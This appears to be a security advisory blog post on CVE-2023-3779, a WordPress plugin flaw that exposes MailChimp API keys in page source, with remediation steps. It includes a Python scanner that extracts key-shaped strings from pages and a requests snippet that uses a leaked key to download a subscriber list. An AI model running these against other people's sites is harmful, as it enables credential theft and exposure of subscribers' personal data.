In June 2023, security researchers disclosed CVE-2023-3779, a sensitive-information-exposure vulnerability in the popular WordPress plugin Essential Addons for Elementor. If you run the premium version of the plugin with the MailChimp block active, your MailChimp API key is exposed to anyone who can load the affected page.
This vulnerability affects versions up to and including 5.8.1 of the plugin. Read on to understand how the issue works, why it matters, and what you should do to stay secure.
What is Essential Addons for Elementor?
Essential Addons for Elementor is a widely used plugin that adds advanced widgets and features to WordPress sites built with Elementor. MailChimp integration is one of its premium features, letting site owners easily create newsletter forms and other mailing list functionality.
The Vulnerability: How API Keys Leak
When a site owner enables the MailChimp block on a page, the plugin writes the site's private MailChimp API key into that page's HTML source in plain text. Anyone who can load the page, including unauthenticated visitors, can open the source and copy the key.
Why is this bad?
MailChimp API keys grant full control of your mailing lists, subscribers, and campaigns. An attacker holding your key can read and export subscriber data, alter or delete lists, and send campaigns from your account, all from outside WordPress and without ever logging in to it.
Exploit Details
Who is affected?
- You run the premium version of Essential Addons for Elementor at version 5.8.1 or earlier
- The MailChimp block is active on at least one page
How easy is it to exploit?
Very easy. No tooling or authentication is needed: browse to a page that contains the MailChimp form and view its source.
Exploitation Walkthrough
Suppose you find a site running Essential Addons for Elementor with a MailChimp signup form. This is how an attacker grabs the key:
Code Example (What an attacker might see)
<script type="text/javascript">
    var mailchimp_settings = {
        api_key: "us5-3f2ba6d3e8806jsIu6tb4f1db14f5c8e-us5",
        list_id: "a1b2c3d4e5",
        ...
    };
</script>
The api_key value above is visible to anyone who views the source, and that is all an attacker needs. (The value shown is a placeholder; a real MailChimp key is 32 hexadecimal characters followed by a dash and the datacenter, for example -us5.)
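The following scanner is an added example, not code from the original post, from the plugin, or from the disclosing researchers. It pulls candidate MailChimp API keys out of page source: an attacker automates exactly this over many sites, and a site owner can run it against their own pages after updating to confirm the key is gone. The HTML sample is constructed, the key inside it is a made-up placeholder, and the key-shape regex assumes MailChimp's documented format (32 hex characters, a dash, then a datacenter such as us5 or us21). It also derives the datacenter by splitting on the last dash rather than slicing the last three characters, because datacenters can be two digits.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of what a vulnerable page's source could contain.
# The key is a made-up placeholder in MailChimp's documented key shape
# (32 hex characters, a dash, the datacenter), not a real credential.
SAMPLE_HTML = """<html><body>
<h1>Newsletter</h1>
<script type="text/javascript">
var mailchimp_settings = {
    api_key: "0123456789abcdef0123456789abcdef-us5",
    list_id: "a1b2c3d4e5"
};
</script>
<script>var tracker = { api_key: "not-a-mailchimp-key" };</script>
</body></html>"""

KEY_SHAPE = r"[0-9a-f]{32}-us\d{1,2}"
# A key sitting anywhere in the page (data attributes, JSON blobs, ...),
# guarded so a longer hex token does not trigger a false positive.
KEY_ANYWHERE_RE = re.compile(rf"(?<![0-9a-zA-Z]){KEY_SHAPE}(?![0-9a-zA-Z])")
KEY_EXACT_RE = re.compile(rf"^{KEY_SHAPE}$")
# Any api_key: "..." or api_key = '...' assignment inside a <script> block.
API_KEY_ASSIGN_RE = re.compile(r"""api_key\s*[:=]\s*["']([^"']+)["']""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


@dataclass(frozen=True)
class Finding:
    value: str
    where: str                 # how the value was spotted
    well_formed: bool          # looks like a genuine MailChimp key
    datacenter: Optional[str]  # e.g. "us5"; None if the suffix is missing


def datacenter_of(key: str) -> Optional[str]:
    """Datacenter is the part after the last dash: "us5", "us21", ...
    Do not slice the last three characters; datacenters can be two digits."""
    _, sep, tail = key.rpartition("-")
    return tail if sep and re.fullmatch(r"us\d{1,2}", tail) else None


def mailchimp_base_url(key: str) -> str:
    """API base for the key's datacenter (Marketing API v3 lives under /3.0)."""
    dc = datacenter_of(key)
    if dc is None:
        raise ValueError("key has no MailChimp datacenter suffix")
    return f"https://{dc}.api.mailchimp.com/3.0"


def scan_page(html: str) -> List[Finding]:
    """Collect every candidate key in the page source, de-duplicated."""
    found: Dict[str, Finding] = {}
    for script in SCRIPT_RE.findall(html):
        for m in API_KEY_ASSIGN_RE.finditer(script):
            v = m.group(1)
            found.setdefault(v, Finding(
                v, "api_key assignment in <script>",
                bool(KEY_EXACT_RE.match(v)), datacenter_of(v)))
    for m in KEY_ANYWHERE_RE.finditer(html):
        v = m.group(0)
        found.setdefault(v, Finding(v, "bare token in page source", True, datacenter_of(v)))
    return list(found.values())


def exposed_keys(html: str) -> List[str]:
    """Only the values shaped like real keys: these are the ones to rotate."""
    return [f.value for f in scan_page(html) if f.well_formed]


if __name__ == "__main__":
    for f in scan_page(SAMPLE_HTML):
        flag = "ROTATE" if f.well_formed else "ignore"
        print(f"{flag:7} {f.value} ({f.where}, dc={f.datacenter})")
```

To check a live page, fetch its source (for example with curl) and pass the text to scan_page; anything reported as well-formed should be treated as compromised and rotated, whether or not the plugin has already been updated.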
Real-World Consequences
Suppose an attacker scrapes your API key. With a few lines of Python and the requests library, they could run:
# Sample Python snippet: list subscribers with a key lifted from the page source
import requests

API_KEY = "us5-3f2ba6d3e8806jsIu6tb4f1db14f5c8e-us5"   # placeholder value from the leaked page
LIST_ID = "a1b2c3d4e5"
DC = API_KEY.rsplit("-", 1)[-1]   # datacenter is the suffix after the last dash (us5, us21, ...)
headers = {"Authorization": f"apikey {API_KEY}"}

# MailChimp Marketing API v3 is served under /3.0/; the default page size is 10,
# so raise count (max 1000) and advance offset to pull the whole list.
response = requests.get(
    f"https://{DC}.api.mailchimp.com/3.0/lists/{LIST_ID}/members",
    headers=headers,
    params={"count": 1000, "offset": 0},
)
response.raise_for_status()
print(response.json())
That is enough to pull your subscriber list; no exploitation skill is required, only a valid key.
Update Immediately:
Upgrade Essential Addons for Elementor to the latest version (5.8.2 or later); see the plugin changelog.
Reset Your MailChimp API Key:
- Log in to your MailChimp account
- Disable (revoke) the exposed key and generate a new one
- Enter the new key in the plugin's MailChimp settings, then view the source of a page with the MailChimp block and confirm the key no longer appears
- Review recent campaigns, list exports, and subscriber changes for activity you did not perform
- Reported: June 2023
- Patched: Version 5.8.2 (release notes)
- CVE Record
- WPScan Entry
- Original Disclosure by Wordfence
Final Thoughts
CVE-2023-3779 is a reminder that even popular, well-maintained plugins can leak dangerous secrets when a convenience feature is coded carelessly. An API key embedded in front-end code is public by definition: keep API keys and other secrets server-side, and have the browser talk to your own endpoint, which holds the key and calls the third-party API on the visitor's behalf.
If you ever used the MailChimp block on a vulnerable version, treat your MailChimp API key as compromised and rotate it now rather than waiting for evidence of abuse. Acting promptly protects both your lists and your reputation.
Timeline
Published on: 07/20/2023 06:15:00 UTC
Last modified on: 07/28/2023 15:41:00 UTC